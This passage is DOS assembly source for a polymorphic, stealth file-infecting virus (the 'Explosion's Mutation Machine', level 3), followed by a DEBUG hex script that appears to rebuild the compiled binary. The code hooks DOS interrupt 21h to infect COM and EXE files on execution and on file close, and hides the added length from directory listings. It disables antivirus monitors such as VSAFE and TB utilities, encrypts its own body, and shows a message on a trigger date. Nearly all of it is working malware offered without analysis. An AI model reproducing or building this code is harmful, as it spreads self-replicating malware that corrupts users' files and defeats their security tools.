mov word ptr rsp+1,cx
mov eflag,010b ;setting parameters for EMM
iCOM2: mov ax,gba
mov word ptr ds:(offset dcmsi+1),ax ;start for decoder
mov word ptr ds:(offset stsub+1),ax ;for proper relocation
mov dx,6
call rnd_get
or dx,dx
jz nguv
or eflag,100b ;generates intro with probability 5 : 1
nguv: call EMM
call encode
jc pikon1
mov ax,hip
cmp bheader.flag,0
jne iEXE3
sub ax,103h
mov word ptr ds:(offset header+1),ax ;setting jump in com
jmp short iCOM3
iEXE3: mov header.vIP,ax ;write down ip
iCOM3: mov cx,di
mov dx,offset hbuf
sub cx,dx
call write_file
pikon1: jc ikon
call start_file
mov cx,18h
mov dx,offset header
call write_file
jc ikon
add lenlo,EXTENTION
adc lenhi,0 ;change length
mov dx,25
call rnd_get ;with probability 1 : 25 does not mark
or dx,dx
jz ikon
mov bx,offset ftime
call identify
mov [bx],ax ;mark file
ikon: mov dx,lenlo
mov cx,lenhi
call pos_start
xor cx,cx
call write_file ;allignment to constant length increase
mov ax,5701h
mov cx,ftime
mov dx,fdate
call mhandle ;setting time and date
retn

sublen:
sub word ptr es:[bx],EXTENTION
sbb word ptr es:[bx+2],0
jnc npretn
add word ptr es:[bx],EXTENTION
adc word ptr es:[bx+2],0
npretn: retn

NOUNF=14 ;number of unfriendly programms
titstr db 3,'COM',3,'EXE'
titstr1 db 4,'SCAN',7,'VSHIELD',5,'CLEAN',8,'FINDVIRU',5,'GUARD'
db 8,'VIVERIFY',2,'TB',2,'-V',7,'VIRSTOP',3,'NOD',4,'HIEW'
db 5,'PASCA',7,'NETENVI',6,'F-PROT',6,'CHKDSK'

check:
push bx
push cx
push si
push di
push ds
push es
push ax
mov si,dx
mov bx,si
xor di,di
mov cx,LENFNB
ol1: lodsb
cmp al,'\'
je stfn
cmp al,'/'
je stfn
cmp al,':'
jne nstfn
stfn: mov bx,si
nstfn: cmp al,'.'
jne itnb1
mov di,si
itnb1: or al,al
jz whname
loop ol1
jmp short oinok
whname: cmp di,bx
jbe oinok
mov si,di
mov di,offset titstr
push cs
pop es

call compare
je porok
call compare
jne oinok ;COM or EXE ?

porok: mov cl,NOUNF+1
mov si,bx
mov di,offset titstr1
ol2: push cx
call compare
pop cx
je fkrpg
loop ol2 ;check for unfriendly progs
oiok: clc
okon: pop ax
pop es
pop ds
pop di
pop si
pop cx
pop bx
retn
fkrpg: cmp cx,2
ja nvpst ;if F-PROT or CHKDSK switch off stealth
pop ax
push ax
cmp ah,4bh ;execute ?
jne nvpst
mov byte ptr cs:(offset rpps1+1),offset ndnxt-offset con1
nvpst: cmp cx,1
je oiok ;can infect CHKDSK
oinok: stc
jmp okon

compare:
push si
mov cl,byte ptr es:[di]
inc di
mov ax,di
add ax,cx
push ax
popdp: lodsb
cmp al,'a'
jb ponmp
cmp al,'z'

       ja      ponmp 
sub al,('a'-'A')
ponmp: scasb
loope popdp
pop di
pop si
retn

;************** 21h handler *************

infname: ;in ds:dx is file name
push ax
push bx
push cx
push si
push di
push bp
push ds
push es

call eliminate_av

call set_on_24
mov ax,4300h
call int21
mov cs:attrib,cx
mov ax,4301h
xor cx,cx
call int21
jc errnd_l1
mov ax,3d02h
call int21
jc errnd_l2
push dx
push ds
push cs
pop ds
push cs
pop es
mov handle,ax
call infect
mov ah,3eh
call mhandle
pop ds
pop dx
errnd_l2: mov ax,4301h
db 0b9h
attrib dw ? ;mov cx,attrib
call int21
errnd_l1: call set_off_24
pop es
pop ds
pop bp
pop di
pop si
pop cx
pop bx
pop ax
retn

res21:
sti
rpps1: jmp short con1 ;switched jump for switching off stealth
con1: cmp ah,11h
je dtrad
cmp ah,12h
jne dnxt
dtrad: push bx
push es
push ax
mov ah,2fh
call int21
pop ax
call int21
cmp al,0ffh
je dterr
push ax
cmp byte ptr es:[bx],0ffh
jne nexp
add bx,7
nexp: add bx,17h
call identify
pop ax
jnc dterr
add bx,1dh-17h
call sublen
dterr: pop es
pop bx
iret
dnxt: cmp ah,4eh
je dffh
cmp ah,4fh
jne ndnxt
dffh: push bx
push es
push ax
mov ah,2fh
call int21
pop ax
call int21
jc ret21
push ax
add bx,16h
call identify
pop ax
jnc ret21_stc
add bx,1ah-16h
call sublen
ret21_stc:
clc
ret21:
pop es
pop bx
rf2: push ax
push bp
mov bp,sp
lahf
mov [bp+08h],ah
pop bp
pop ax
iret
ndnxt: cmp ah,31h
je trmsr
cmp ah,4ch
jne nkprg
mov byte ptr cs:(offset rpps1+1),0
trmsr: call eliminate_av
nkprg: cld
push dx
cmp ax,4b00h
je infac
cmp ax,6c00h
jne nxts
test dl,00010010b
mov dx,si
jnz saveh
nxts: cmp ah,3ch
je saveh
cmp ah,5bh
je saveh
cmp ah,3eh
jne jornd_l21
cmp bx,cs:chandle
jne jornd_l21
or bx,bx
jz jornd_l21
mov cs:chandle,0
call int21
jc pdxrf2
push ds
push cs
pop ds
mov dx,offset fname
call infname
pop ds
miretc: clc
pdxrf2: pop dx
jmp rf2
jornd_l21: pop dx
cli
jmp cs:oriv21

infac:
call check
jc jornd_l21
call infname
jmp short jornd_l21

saveh:
cmp cs:chandle,0
jne jornd_l21
call check
jc jornd_l21
mov cs:rhdx,dx
pop dx
push dx
call int21
db 0bah
rhdx dw ? ;mov dx,rhdx
jc pdxrf2
push cx
push si
push di
push es
mov si,dx
mov di,offset chandle
push cs
pop es
stosw
mov cx,LENFNB
rep movsb
pop es
pop di
pop si
pop cx
jmp short miretc

NUMTBN=4
tbname db 'TBMEMXXX','TBCHKXXX','TBDSKXXX','TBFILXXX'

eliminate_av:
push ax
push dx
push ds
mov ah,0ffh
xor bl,bl
int 13h ;eliminates NOHARD
mov ah,0feh
int 13h ;eliminates NOFLOPPY
mov ax,0fa02h
mov dx,5945h
mov bl,31h
int 16h ;eliminates VSAFE
push cs
pop ds
mov ah,52h
int 21h
les bx,es:[bx+22h]
next_device:
mov si,offset tbname-8
mov cx,NUMTBN
next_tb_utility:
push cx
add si,8
lea di,[bx+0ah]
mov cx,4
push si
repe cmpsw
pop si
pop cx
loopne next_tb_utility
jne not_tb_utility
or byte ptr es:[0016h],01h ;eliminates TB-utility
not_tb_utility:
les bx,es:[bx]
cmp bx,0ffffh
jne next_device
pop ds
pop dx
pop ax
retn

owname db 'COMMAND',00h
stsub:
mov ax,0000h
mov cl,4
shr ax,cl
mov dx,cs
add ax,dx
push ax
mov ax,offset mdcs
push ax
retf ;relocation cs:ip

mdcs:
cld
push cs
pop ds
mov ax,DEPTH
sub ax,ssp
dec cx
div cl ;al=ax/3
shl ax,1 ;ax=ax*2/3
add sp,ax ;sp to orig. value

;**************** action *****************

mov cl,ORDER
mov ax,counter
div cl
or ah,ah
jnz nap
mov ah,2ah
int 21h
cmp dl,7
jne nap
mov ah,09h
mov dx,offset mess1
int 21h
mov dx,3cch
in al,dx
and al,11111101b
mov dl,0c2h
out dx,al
mov ah,4ch
int 21h

nap: call eliminate_av ;eliminates AVIR

mov ah,62h
int 21h ;in bx PSP
push bx
xor ax,ax
mov ds,ax
mov ds,word ptr ds:(offset MEMPOS+3)
cmp word ptr owname,'OC'
je pinchb ;already res

;**************** instalation into memory ******************

xchg ax,bx
dec ax
mov ds,ax
add ax,ds:[03h]
sub ax,((end_res-start_virus)-1)/16+2-1 ;segment for virus is in ax
mov dx,cs
add dx,(LENVIR-1)/16+1 ;end of virus code
cmp ax,dx
jb tranw
mov dx,cs
add dx,cs:bheader.min ;min memory req.
cmp ax,dx
jb tranw
mov dx,ss
mov si,sp
inc si
mov cl,4
shr si,cl
inc si
add dx,si ;end of stack
cmp ax,dx
jnb intdp
tranw: mov ah,48h
mov bx,0ffffh
int 21h
cmp bx,((end_res-start_virus)-1)/16+2
jnb dbjdv
pinchb: jmp inchb
dbjdv: mov ah,48h
int 21h
dec ax
mov ds,ax
mov word ptr ds:[01h],0000h
add ax,ds:[03h]
sub ax,((end_res-start_virus)-1)/16+2-1 ;segment for virus is in ax
intdp: mov dl,byte ptr ds:[00h]
mov byte ptr ds:[00h],'M'
sub word ptr ds:[03h],((end_res-start_virus)-1)/16+2
mov ds:[12h],ax
mov ds,ax
mov byte ptr ds:[00h],dl
inc ax
mov word ptr ds:[01h],ax
mov word ptr ds:[03h],((end_res-start_virus)-1)/16+1
push ds
pop es
push cs
pop ds

inc counter ;generation

mov si,offset owname
mov di,08h
movsw
movsw
movsw
movsw ;name of owner
mov es,ax
xor si,si
mov di,si
mov cx,LENVIR
rep movsb ;copying of body
mov si,offset zencode
mov cx,(zenden-zencode)
rep movsb ;copying of necessay routines
xor ax,ax
mov es:chandle,ax ;initialisation of variable
mov ds,ax
mov ax,ds:046ch
mov es:rnd1,ax
mov ax,ds:046eh
mov es:rnd2,ax ;initialisation rnd_get
mov byte ptr ds:(offset MEMPOS),0eah
mov word ptr ds:(offset MEMPOS+1),offset res21
mov word ptr ds:(offset MEMPOS+3),es
cli
mov ax,ds:(4*21h)
mov word ptr es:oriv21,ax
mov ax,ds:(4*21h+2)
mov word ptr es:(oriv21+2),ax
mov word ptr ds:(4*21h),MEMPOS
mov ds:(4*21h+2),ds
sti
inchb: pop bx
push cs
pop ds
mov es,bx
mov si,offset bheader
cmp [si].flag,0
jne zuEXE
mov di,100h
mov [si].vIP,di
mov [si].vCS,bx
movsb
movsw
jmp short zuCOM
zuEXE: mov ax,cs
sub ax,[si].id ;sub cs from exe header (infected)
add [si].vCS,ax
add ax,[si].vSS
mov ss,ax
zuCOM: mov ds,bx
xor ax,ax
jmp dword ptr cs:bheader.vIP

counter dw 1250
mess1 db 0dh,0ah,'Welcome to the Explosion''s Mutation Machine !',0dh,0ah
db 'Dis is level 3.',0dh,0ah,'$'

end_virus label near

;************************ copied routines and heap ***********************

encode:
mov cx,LENVIR
xor dx,dx ;offset start_virus
call zp1
mov ah,40h
mov bx,handle
pushf
db 9ah ;call oriv21
oriv21 dd ?
jc ec1
cmp ax,cx
ec1: pushf
call zp1
popf
retn
zp1: push cx
mov si,dx
ecmax: mov ax,1234h
mov cx,(LENVIR-1)/2+1
zp2: xor [si],ax
ecaax1: add ax,1234h
inc si
xor [si],ax
ecaax2: add ax,1234h
inc si
loop zp2
pop cx
retn

res24:
mov al,03h
iret

handle dw ?
header strc <>
off24 dw ?
seg24 dw ?
ftime dw ?
fdate dw ?
lenlo dw ?
lenhi dw ?
chandle dw ?
fname db LENFNB dup(?)

retnaddr dw ?
sodec dw ?
hend dw ?
ptei dw ?
ei db 6*25 dup(?)
eei label near
rel dw ?
gba dw ?
eflag db ? ;input flags (0-set DS,1-set SP,2-gen. intro)
hip dw ?
hbuf db LENHBUF dup(?)

end_res label near

virus_segment ends
end stsub
---------------------------
N Level3.exe
E 0100 4D 5A 04 01 0A 00 00 00 20 00 3D 00 FF FF 00 00
E 0110 80 00 00 00 89 0E 09 00 3E 00 00 00 01 00 FB 30
E 0120 6A 72 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0130 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0140 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0150 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0160 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0170 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0180 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0190 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 01A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 01B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 01C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 01D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 01E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 01F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0200 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0210 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0220 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0230 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0240 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0250 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0260 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0270 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0280 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0290 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 02A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 02B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 02C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 02D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 02E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 02F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0300 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0310 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0320 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0330 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0340 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0350 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0360 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0370 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0380 B8 00 4C CD 21 00 00 00 00 00 00 00 00 00 00 00
E 0390 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0F
E 03A0 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 03B0 00 00 00 01 00 00 00 00 00 10 00 1E 00 00 02 2A
E 03C0 20 45 4D 4D 20 31 2E 30 20 2A 56 50 53 51 52 B9
E 03D0 00 00 BB 00 00 BA 5A 01 B8 35 4E 96 92 85 C0 74
E 03E0 02 F7 E3 E3 05 91 F7 E6 03 C1 96 F7 E3 03 D6 40
E 03F0 83 D2 00 2E A3 43 00 2E 89 16 40 00 8B C2 59 33
E 0400 D2 E3 04 F7 F1 EB 01 92 59 5B 58 5E C3 00 00 00
E 0410 00 00 00 00 04 00 00 00 08 00 00 00 0C 00 00 00
E 0420 00 00 00 00 04 00 00 00 08 00 00 00 0C 00 00 00
E 0430 00 00 00 00 00 00 50 51 52 56 33 C9 AC 98 03 C8
E 0440 3C FF AD 75 F7 41 5E 8B D1 E8 7E FF AC 98 2B C8
E 0450 AD 3B D1 72 F7 96 5A 59 58 FF E6 50 53 8B F2 D1
E 0460 E6 D1 E6 BB 7D 00 03 F3 B5 03 80 3E A5 00 00 75
E 0470 11 83 C6 03 AC 98 96 03 F3 FE CD F6 C2 04 75 02
E 0480 FE CD 5B 58 C3 51 56 BA 08 00 E8 3D FF E8 CB FF
E 0490 F6 04 04 75 F2 5E 59 C3 50 32 E4 EB 03 50 B4 04
E 04A0 51 56 55 BA 08 00 E8 21 FF 8B EA 33 D2 8A CA E8
E 04B0 A9 FF AC 84 C4 75 0E 24 03 3C 03 74 04 3A C5 75
E 04C0 04 41 4D 78 12 42 83 FA 08 72 E4 0A C9 75 03 F9
E 04D0 EB 06 83 E2 07 EB D8 F8 5D 5E 59 58 C3 51 56 E8
E 04E0 79 FF 46 80 FD 03 75 04 89 04 EB 08 80 FD 01 74
E 04F0 01 46 88 04 5E 59 C3 51 56 E8 5F FF 46 80 FD 03
E 0500 75 03 AD EB 07 80 FD 01 74 01 46 AC 5E 59 C3 0A
E 0510 06 A5 00 52 B1 03 D2 E2 0A E2 5A C3 E8 66 FF 52
E 0520 A0 A5 00 B1 03 D2 E0 0C B0 0A C2 AA 33 D2 E8 99
E 0530 FE 92 5A E8 A7 FF E8 22 FF 08 2C 80 FD 03 75 04
E 0540 AB EB 02 90 AA C3 E8 4F FF 72 FA E8 A9 FF 50 B8
E 0550 8A C0 0A 06 A5 00 0A E2 8B DA E8 28 FF 3B DA 74
E 0560 F9 E8 AF FF AB 58 E8 74 FF E8 EF FE 08 2C C3 2D
E 0570 8C 01 2D B6 01 03 60 02 03 64 02 01 44 02 01 13
E 0580 02 01 FB 01 FF BE DF 01 E9 AB FE C6 06 A5 00 01
E 0590 F6 06 A0 00 01 75 0B E8 FE FE 72 06 B8 8E D8 0A
E 05A0 E2 AB C3 C6 06 A5 00 01 BA 20 00 E8 1C FE B8 8C
E 05B0 C0 0A E2 80 E4 F8 E8 CC FE 0A E2 AB E8 9C FE 80
E 05C0 E4 18 74 04 80 24 FC C3 A0 9D 00 88 04 A1 9E 00
E 05D0 89 44 01 C3 C6 06 A5 00 01 E8 BC FE 72 11 B8 8E
E 05E0 C0 0A E2 AB E8 10 FF 80 0E 9D 00 03 A3 9E 00 C3
E 05F0 B0 32 EB 02 B0 2A B4 C0 E8 8A FE 0A E2 E8 5B FE
E 0600 08 2C C7 06 8C 02 32 C0 EB 77 A0 A5 00 00 06 8C
E 0610 02 E8 E3 FE 8B 2E A2 00 55 9D FB FC 0A C3 9C 5D
E 0620 89 2E A2 00 E9 B6 FE E8 E0 FF 80 0E A1 00 01 C3
E 0630 2D F7 02 2D DE 02 0A C4 02 FF AC B4 C3 A3 8C 02
E 0640 AC A2 D6 02 AC B4 C0 A3 E8 02 AD A3 FE 02 BE A0
E 0650 02 E9 E2 FD 33 D2 E8 02 FE AC 24 03 3C 03 74 04
E 0660 3A C5 75 23 52 B0 0C 0A 06 A5 00 AA EB 29 E8 27
E 0670 FE 72 3C E8 81 FE 93 B8 0A C0 0A E2 E8 1E FE 72
E 0680 2E E8 8B FE AB EB A0 E8 13 FE 72 23 52 B8 80 C8
E 0690 0A 06 A5 00 0A E2 AB 33 D2 E8 2E FD 8B DA 5A E8
E 06A0 85 FF 93 80 3E A5 00 00 74 04 AB EB 02 90 AA C3
E 06B0 0A 0C 0A 80 C8 BE 20 03 EB 80 22 24 22 80 E0 BE
E 06C0 2A 03 EB F4 32 34 32 80 F0 BE 34 03 EB EA 84 A8
E 06D0 84 F6 C0 BE 3E 03 C6 06 0F 01 00 E8 5C FF C6 06
E 06E0 0F 01 04 C3 3A 3C 3A 80 F8 BE 54 03 EB E8 02 04
E 06F0 02 80 C0 BE 5E 03 EB D4 2A 2C 2A 80 E8 BE 68 03
E 0700 EB CA 12 14 12 80 D0 BE 72 03 F6 06 A1 00 01 75
E 0710 BB C3 1A 1C 1A 80 D8 BE 82 03 EB EE 01 B7 03 01
E 0720 A5 03 FF AD A3 8C 02 AD A3 AB 03 AC A2 C2 03 BE
E 0730 8C 03 E9 01 FD E8 65 FD 72 D7 B8 FE C0 0A 06 A5
E 0740 00 0A E2 AB E9 C3 FE C6 06 A5 00 01 E8 4E FD 72
E 0750 C0 B0 40 0A C2 AA E9 B1 FE FE C0 FE C0 40 BE C9
E 0760 03 EB C0 FE C8 FE C8 48 BE D3 03 EB B6 F6 D8 F6
E 0770 D8 BE DD 03 57 E8 12 00 58 3B F8 76 05 80 0E A1
E 0780 00 01 C3 F6 D0 F6 D0 BE F3 03 C7 06 A0 03 8F 03
E 0790 E8 90 FF C7 06 A0 03 8C 03 C3 01 17 04 01 3F 04
E 07A0 FF BE 0A 04 E9 8F FC E8 F3 FC 72 ED E8 48 FD 93
E 07B0 B8 86 C0 0A E2 8B EA E8 E3 FC 3B EA 74 DB 55 E8
E 07C0 4D FD AB E8 31 FD 93 E8 13 FD 5A 93 E9 0E FD C6
E 07D0 06 A5 00 01 E8 C6 FC 72 C0 80 3E 7D 00 03 75 B9
E 07E0 E8 14 FD 93 B0 90 0A C2 52 33 D2 AA EB D5 B0 D0
E 07F0 F6 06 81 00 01 74 0E BA 02 00 E8 CD FB D0 E2 0A
E 0800 C2 8A 0E 82 00 A3 8C 02 E8 92 FC 72 27 80 26 A1
E 0810 00 FE E9 28 FF B4 E0 EB D5 B4 E8 EB D1 B4 F8 EB
E 0820 CD B4 C0 EB C9 B4 C8 EB C5 B4 D0 F6 06 A1 00 01
E 0830 74 02 EB BA C3 B4 D8 EB F2 0F C5 04 03 EC 04 01
E 0840 07 05 FF 83 3E 0F 00 00 74 EA BE A9 04 C6 06 A5
E 0850 00 01 E9 E1 FB E8 2D FC B0 50 0A C2 AA E8 FB FB
E 0860 AC 91 E8 92 FC 83 2E 0F 00 03 83 2E 8E 00 02 8B
E 0870 36 0F 00 88 8C 00 00 89 84 01 00 C3 BA 20 00 E8
E 0880 48 FB 92 0C 06 24 FE AA 32 C9 3C 06 75 D7 A1 9E
E 0890 00 8A 0E 9D 00 EB CE B0 9C EB EC 0F 24 05 02 4F
E 08A0 05 01 5D 05 03 69 05 FF 83 3E 0F 00 0F 74 85 BE
E 08B0 0B 05 EB 99 E8 CE FB B0 58 0A C2 AA E8 09 00 E8
E 08C0 99 FB 88 0C E8 16 FC C3 8B 36 0F 00 8A 8C 00 00
E 08D0 8B 84 01 00 83 06 0F 00 03 83 06 8E 00 02 C3 B0
E 08E0 07 AA E8 E3 FF 88 0E 9D 00 A3 9E 00 C3 F6 06 A0
E 08F0 00 01 75 F8 B0 1F AA EB CF F6 06 A0 00 01 75 EC
E 0900 B8 0E 1F AB 80 0E A0 00 01 C3 50 51 52 8B CA E3
E 0910 09 33 D2 E8 B4 FA 92 AA E2 F7 5A 59 58 C3 E8 A9
E 0920 FA 03 F2 AC C3 77 73 72 76 74 7F 7D 7C 7E EB 75
E 0930 71 7B 79 70 7A 78 E3 E2 E1 E0 18 BD 05 05 F7 05
E 0940 01 10 06 03 1F 06 FF BE AA 05 E9 E9 FA F6 06 A1
E 0950 00 01 74 32 BE 95 05 BA 11 00 E8 C1 FF AA A2 DB
E 0960 05 8B 0E 82 00 8B 2E A2 00 55 9D EB 09 33 D2 E8
E 0970 58 FA 92 AA EB 0C BA 14 00 E8 4E FA 8A C2 AA E8
E 0980 88 FF 89 0E 82 00 C3 80 3E 81 00 03 75 F8 BE A6
E 0990 05 BA 02 00 F6 06 A1 00 01 74 BF BA 04 00 EB BA
E 09A0 B0 E9 AA BA 14 00 E8 21 FA 8B C2 AB E9 5B FF F6
E 09B0 06 7E 11 04 74 D0 B0 E8 AA A1 DC 10 48 48 2B C7
E 09C0 AB C3 FB FA FD FC BE 32 06 BA 04 00 E8 4F FF AA
E 09D0 C3 04 54 06 04 61 06 04 6E 06 01 7B 06 FF BE 41
E 09E0 06 E9 52 FA 8B 2E 96 00 B4 84 80 3E 95 00 03 74
E 09F0 1E 8B 2E 9A 00 B4 85 80 3E 99 00 03 74 11 8B 2E
E 0A00 8A 00 B4 87 80 3E 89 00 03 74 04 33 ED B4 06 C3
E 0A10 F6 06 A0 00 01 75 04 C6 05 2E 47 C3 E8 79 FA 72
E 0A20 3F 50 E8 D2 FA 0A C0 58 74 36 E8 E6 FA 0A 06 A5
E 0A30 00 E8 DC FF AB 8B 36 E2 10 89 04 E8 B9 FA 89 44
E 0A40 04 BA 21 00 2A 16 A5 00 E8 7F F9 89 54 02 83 06
E 0A50 E2 10 06 A1 DE 10 03 C2 2B C5 AB 80 26 A1 00 FE
E 0A60 C3 06 08 08 02 02 00 F7 06 00 FB 06 00 FF 06 00
E 0A70 03 07 00 25 07 FF 81 3E E2 10 7A 11 73 E2 E8 5D
E 0A80 FF BE D6 06 E9 AF F9 B0 30 EB 91 B0 00 EB 8D B0
E 0A90 28 EB 89 B0 D0 BA 04 00 E8 2F F9 0B D2 74 10 F6
E 0AA0 06 81 00 01 74 09 80 3E 82 00 00 74 02 0C 02 BA
E 0AB0 01 00 E9 78 FF 80 CC 08 EB D9 05 3A 07 01 68 07
E 0AC0 FF E8 1A FF BE 2A 07 E9 6C F9 E8 B8 F9 B0 8A E8
E 0AD0 3D FA 52 E8 3A FF AB 8B D7 81 EA 82 11 E8 EA F8
E 0AE0 A1 7A 11 03 C2 2B C5 AB 92 5A E8 6E F9 08 2C BE
E 0AF0 81 11 03 F0 AD E9 E5 F9 E8 9D F9 72 17 B0 88 E8
E 0B00 0D FA E8 0B FF AB BA 0E 00 E8 BE F8 A1 7C 11 03
E 0B10 C2 2B C5 AB C3 0D B7 05 20 E6 06 11 31 07 46 F5
E 0B20 01 01 36 06 10 B3 04 10 18 05 04 85 04 04 89 04
E 0B30 02 8D 04 02 91 04 02 95 04 02 99 04 02 A5 04 07
E 0B40 25 03 07 2F 03 04 39 03 04 43 03 09 63 03 09 6D
E 0B50 03 02 77 03 02 87 03 04 59 03 04 CE 03 04 D8 03
E 0B60 04 11 04 02 E1 03 02 F7 03 FF FC B9 0A 00 BF 7D
E 0B70 00 33 C0 AA 83 C7 03 E2 FA 93 A0 7E 11 24 01 A2
E 0B80 A0 00 B0 04 F6 06 7E 11 02 74 02 0C 03 08 06 8D
E 0B90 00 C7 06 0F 00 0F 00 C7 06 E2 10 E4 10 B9 05 00
E 0BA0 BE D1 06 BF D6 06 AC 98 92 E8 1E F8 92 03 D8 AA
E 0BB0 47 47 E2 F2 0B DB 74 E5 BF 81 11 B8 FF FF 50 F6
E 0BC0 06 7E 11 04 74 1E 58 BA 63 00 E8 FD F7 42 52 52
E 0BD0 E8 F7 F7 E8 34 FD 89 3E DC 10 B0 C3 AA 58 2B C2
E 0BE0 92 E8 26 FD 8B C7 2D 81 11 03 06 7A 11 A3 7F 11
E 0BF0 BA 0C 01 58 2B D0 E8 D1 F7 03 D0 81 C2 90 01 89
E 0C00 16 E0 10 81 06 E0 10 81 11 03 16 7A 11 89 16 DE
E 0C10 10 C7 06 9E 08 85 07 C6 06 A5 08 00 57 BA 03 00
E 0C20 E8 A7 F7 0A D2 74 02 B2 01 88 16 A5 00 BE 85 07
E 0C30 E8 03 F8 58 EB 00 57 83 C7 16 3B 3E E0 10 5F 72
E 0C40 DB C7 06 9E 08 8E 07 C6 06 A5 08 18 EB CE 3B 3E
E 0C50 E0 10 72 C8 97 75 C5 97 8B DF B8 B7 0F 2B C7 A3
E 0C60 38 09 BE 21 09 B9 21 00 F3 A4 8B 36 E2 10 81 FE
E 0C70 E4 10 76 3C 83 EE 06 8A 04 8A D0 80 E2 FC 80 FA
E 0C80 00 75 02 0C 28 80 FA 28 75 02 24 03 B4 8F 81 24
E 0C90 FC 38 81 3C D0 08 75 03 80 E4 C7 A3 1A 09 8B 54
E 0CA0 02 89 16 1C 09 8B 4C 04 EB 00 31 8F 34 12 EB BE
E 0CB0 C3 FB 0E 1F BE 34 12 B8 34 12 B9 1D 08 31 04 EB
E 0CC0 09 05 34 12 46 E2 F6 E9 00 00 05 34 12 46 31 04
E 0CD0 EB EF B9 3A 10 33 D2 E8 16 00 B4 40 8B 1E 74 10
E 0CE0 9C 9A 00 00 00 00 72 02 3B C1 9C E8 02 00 9D C3
E 0CF0 51 8B F2 B8 34 12 B9 1D 08 31 04 05 34 12 46 31
E 0D00 04 05 34 12 46 E2 F2 59 C3 B0 03 CF 52 1E 0E 1F
E 0D10 B8 24 35 E8 65 00 8C 06 90 10 89 1E 8E 10 B8 24
E 0D20 25 BA 71 10 E8 54 00 1F 5A C3 B8 24 25 2E C5 16
E 0D30 8E 10 E8 46 00 C3 52 26 8B 47 02 40 33 D2 2E F7
E 0D40 36 2B 00 26 8B 07 24 1F 3A C2 F9 74 09 26 8B 07
E 0D50 25 E0 FF 0A C2 F8 5A C3 B4 40 EB 02 B4 3F E8 15
E 0D60 00 72 02 3B C1 C3 33 C9 8B D1 B8 00 42 EB 07 33
E 0D70 C9 8B D1 B8 02 42 2E 8B 1E 74 10 9C FA 2E FF 1E
E 0D80 4A 10 C3 B8 00 57 E8 ED FF BB 92 10 89 0F 89 57
E 0D90 02 E8 A2 FF 73 01 C3 33 D2 E8 2E F6 89 16 28 09
E 0DA0 89 16 5C 10 33 D2 E8 21 F6 89 16 3B 09 89 16 64
E 0DB0 10 33 D2 E8 14 F6 89 16 32 09 89 16 6A 10 E8 A5
E 0DC0 FF B9 18 00 BA 76 10 E8 92 FF 72 CA 8B F2 BF 11
E 0DD0 00 F3 A4 52 E8 98 FF A3 96 10 89 16 98 10 8B F0
E 0DE0 8B FA 5B 81 3F 5A 4D 74 18 81 3F 4D 5A 74 12 C6
E 0DF0 06 23 00 00 3D 79 EC 77 9D C7 06 1B 00 00 00 EB
E 0E00 2B C6 06 23 00 01 8B 47 04 F7 26 2D 00 2B C6 1B
E 0E10 D7 72 B7 8B C6 8B D7 05 06 13 83 D2 00 F7 36 2D
E 0E20 00 0B D2 74 01 40 89 47 04 89 57 02 83 E6 F0 83
E 0E30 C6 10 83 D7 00 8B D6 8B CF 53 E8 2D FF 5B 80 3E
E 0E40 23 00 00 75 17 C6 07 E9 05 00 01 A3 7C 11 05 3A
E 0E50 10 A3 7A 11 C6 06 7E 11 01 90 EB 51 8B 47 08 F7
E 0E60 26 29 00 2B F0 1B FA 8B C6 8B D7 F7 36 29 00 89
E 0E70 47 16 A3 11 00 8B 47 0E F7 26 29 00 8B 4F 10 03
E 0E80 C1 83 D2 00 2B C6 1B D7 72 0D 2D 80 00 83 DA 00
E 0E90 72 5A 81 47 0E 30 01 C7 06 7A 11 3A 10 C7 06 7C
E 0EA0 11 00 00 89 0E 8E 00 C6 06 7E 11 02 90 A1 7C 11
E 0EB0 A3 25 09 A3 8A 0E BA 06 00 E8 0E F5 0B D2 74 05
E 0EC0 80 0E 7E 11 04 E8 A2 FC E8 FF 04 72 1F A1 7F 11
E 0ED0 80 3E 23 00 00 75 08 2D 03 01 A3 77 10 EB 03 A3
E 0EE0 8A 10 8B CF BA 81 11 2B CA E8 6C FE 72 2B E8 75
